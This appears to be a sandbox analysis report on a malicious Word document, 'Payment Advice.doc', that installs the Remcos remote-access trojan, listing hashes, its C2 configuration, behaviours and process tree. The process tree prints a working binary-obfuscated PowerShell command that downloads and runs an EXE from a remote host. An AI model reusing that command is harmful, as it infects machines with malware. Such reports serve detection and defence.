Analysis
-
max time kernel
299s -
max time network
298s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
15-07-2021 20:14
Static task
static1
Behavioral task
behavioral1
Sample
Payment Advice.doc
Resource
win7v20210408
Behavioral task
behavioral2
Sample
Payment Advice.doc
Resource
win10v20210410
General
-
Target
Payment Advice.doc
-
Size
217KB
-
MD5
a1bb900ae8003b924f333442c4117a84
-
SHA1
126cd9e2de926ade2cdb20fb8d2a059b7786fde6
-
SHA256
9c5912424f920b71a98b0ac032cb3e74ca830dd0c9e9e2d406f4b9ff1f53af80
-
SHA512
c7dbbc07793a59b038f5376b345aeb9c967f339b36e9242043207a66bc27a6b3046f7d143a61d48ae4ef9423efcff6919d30cfb86e736f16aa74dcf81c812f5e
Malware Config
Extracted
remcos
JULBUILD
saptransmissions.dvrlists.com:6969
-
audio_folder
MicRecords
-
audio_path
%AppData%
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
install_path
%AppData%
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
JULBUILD
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
JULBUILD-7DBACB
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
-
take_screenshot_title
wikipedia;solitaire;
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 404 3256 powershell.exe WINWORD.EXE -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exemshta.exeflow pid process 30 404 powershell.exe 35 2496 mshta.exe 39 2496 mshta.exe 40 2496 mshta.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
winint.exepid process 4036 winint.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
winint.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\Kajscxo = "C:\\Users\\Public\\Libraries\\oxcsjaK.url" winint.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3256 WINWORD.EXE 3256 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 404 powershell.exe 404 powershell.exe 404 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
mshta.exepid process 2496 mshta.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 404 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 3256 WINWORD.EXE 3256 WINWORD.EXE 3256 WINWORD.EXE 3256 WINWORD.EXE 3256 WINWORD.EXE 3256 WINWORD.EXE 3256 WINWORD.EXE -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
WINWORD.EXEpowershell.exewinint.exedescription pid process target process PID 3256 wrote to memory of 404 3256 WINWORD.EXE powershell.exe PID 3256 wrote to memory of 404 3256 WINWORD.EXE powershell.exe PID 404 wrote to memory of 4036 404 powershell.exe winint.exe PID 404 wrote to memory of 4036 404 powershell.exe winint.exe PID 404 wrote to memory of 4036 404 powershell.exe winint.exe PID 4036 wrote to memory of 2496 4036 winint.exe mshta.exe PID 4036 wrote to memory of 2496 4036 winint.exe mshta.exe PID 4036 wrote to memory of 2496 4036 winint.exe mshta.exe PID 4036 wrote to memory of 2496 4036 winint.exe mshta.exe PID 4036 wrote to memory of 2496 4036 winint.exe mshta.exe PID 4036 wrote to memory of 2496 4036 winint.exe mshta.exe PID 4036 wrote to memory of 2496 4036 winint.exe mshta.exe PID 4036 wrote to memory of 2496 4036 winint.exe mshta.exe PID 4036 wrote to memory of 2496 4036 winint.exe mshta.exe PID 4036 wrote to memory of 2496 4036 winint.exe mshta.exe PID 4036 wrote to memory of 2496 4036 winint.exe mshta.exe PID 4036 wrote to memory of 2496 4036 winint.exe mshta.exe PID 4036 wrote to memory of 2496 4036 winint.exe mshta.exe PID 4036 wrote to memory of 2496 4036 winint.exe mshta.exe PID 4036 wrote to memory of 2496 4036 winint.exe mshta.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Payment Advice.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v78df0=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,01110011,00111010,00101111,00101111,01100011,01100100,01101110,00101110,01100100,01101001,01110011,01100011,01101111,01110010,01100100,01100001,01110000,01110000,00101110,01100011,01101111,01101101,00101111,01100001,01110100,01110100,01100001,01100011,01101000,01101101,01100101,01101110,01110100,01110011,00101111,00111000,00110101,00110110,00111001,00110010,00110101,00111001,00110101,00110010,00110000,00110000,00110100,00110000,00110110,00110011,00110010,00110100,00110010,00101111,00111000,00110110,00110101,00110010,00110111,00110100,00110010,00110000,00110010,00110011,00110111,00111000,00110110,00110000,00110000,00110100,00110100,00111001,00101111,01010011,01100101,01100011,01110101,01110010,01100101,01000101,01000110,01010100,01001110,01101111,01110100,01101001,01100011,01100101,00101110,01100101,01111000,01100101,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01110111,01101001,01101110,01101001,01101110,01110100,00101110,01100101,01111000,01100101,00100111,00100111,00101001,00100111,00111011,00100100,01010100,01000011,00111101,01001001,01000101,01011000,00100000,00101000,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,00101001,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01110111,01101001,01101110,01101001,01101110,01110100,00101110,01100101,01111000,01100101,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $v78df0)|IEX2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\winint.exe"C:\Users\Admin\AppData\Local\Temp\winint.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\System32\mshta.exe4⤵
- Blocklisted process makes network request
- Suspicious behavior: GetForegroundWindowSpam
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\winint.exeMD5
36f250cb265a9ea1e50697c0def52aa8
SHA1ab1b5c8c68b77b4ab53cfed9ee5f2c192a29f5a3
SHA256eb92966bcd8187376efd77e3ce4d830b8ae81de436f23a604c218beac3554514
SHA512ef70fa852f3a4abc6bae263fb423be14e246739814471d7ddbcc588e30f5345910490a49f2a396e4da24c70427d103934a4502e7dea9dec9dc370d8315bc9c56
-
C:\Users\Admin\AppData\Local\Temp\winint.exeMD5
36f250cb265a9ea1e50697c0def52aa8
SHA1ab1b5c8c68b77b4ab53cfed9ee5f2c192a29f5a3
SHA256eb92966bcd8187376efd77e3ce4d830b8ae81de436f23a604c218beac3554514
SHA512ef70fa852f3a4abc6bae263fb423be14e246739814471d7ddbcc588e30f5345910490a49f2a396e4da24c70427d103934a4502e7dea9dec9dc370d8315bc9c56
-
memory/404-266-0x0000000000000000-mapping.dmp
-
memory/404-289-0x000001A77F8E6000-0x000001A77F8E8000-memory.dmpFilesize
8KB
-
memory/404-288-0x000001A77F8E3000-0x000001A77F8E5000-memory.dmpFilesize
8KB
-
memory/404-287-0x000001A77F8E0000-0x000001A77F8E2000-memory.dmpFilesize
8KB
-
memory/404-282-0x000001A77FAF0000-0x000001A77FAF1000-memory.dmpFilesize
4KB
-
memory/404-278-0x000001A77F4A0000-0x000001A77F4A1000-memory.dmpFilesize
4KB
-
memory/2496-318-0x0000000000970000-0x00000000009EA000-memory.dmpFilesize
488KB
-
memory/2496-314-0x0000000000000000-mapping.dmp
-
memory/2496-316-0x0000000000920000-0x0000000000921000-memory.dmpFilesize
4KB
-
memory/2496-315-0x00000000008F0000-0x00000000008F1000-memory.dmpFilesize
4KB
-
memory/2496-317-0x0000000010590000-0x000000001060D000-memory.dmpFilesize
500KB
-
memory/2496-319-0x0000000000770000-0x0000000000771000-memory.dmpFilesize
4KB
-
memory/3256-122-0x00007FFCD56E0000-0x00007FFCD67CE000-memory.dmpFilesize
16.9MB
-
memory/3256-123-0x00007FFCD37E0000-0x00007FFCD56D5000-memory.dmpFilesize
31.0MB
-
memory/3256-114-0x00007FFCBABC0000-0x00007FFCBABD0000-memory.dmpFilesize
64KB
-
memory/3256-118-0x00007FFCDC8B0000-0x00007FFCDF3D3000-memory.dmpFilesize
43.1MB
-
memory/3256-119-0x00007FFCBABC0000-0x00007FFCBABD0000-memory.dmpFilesize
64KB
-
memory/3256-117-0x00007FFCBABC0000-0x00007FFCBABD0000-memory.dmpFilesize
64KB
-
memory/3256-116-0x00007FFCBABC0000-0x00007FFCBABD0000-memory.dmpFilesize
64KB
-
memory/3256-115-0x00007FFCBABC0000-0x00007FFCBABD0000-memory.dmpFilesize
64KB
-
memory/4036-304-0x0000000000000000-mapping.dmp
-
memory/4036-308-0x0000000000760000-0x0000000000761000-memory.dmpFilesize
4KB
-
memory/4036-311-0x0000000005790000-0x00000000057AA000-memory.dmpFilesize
104KB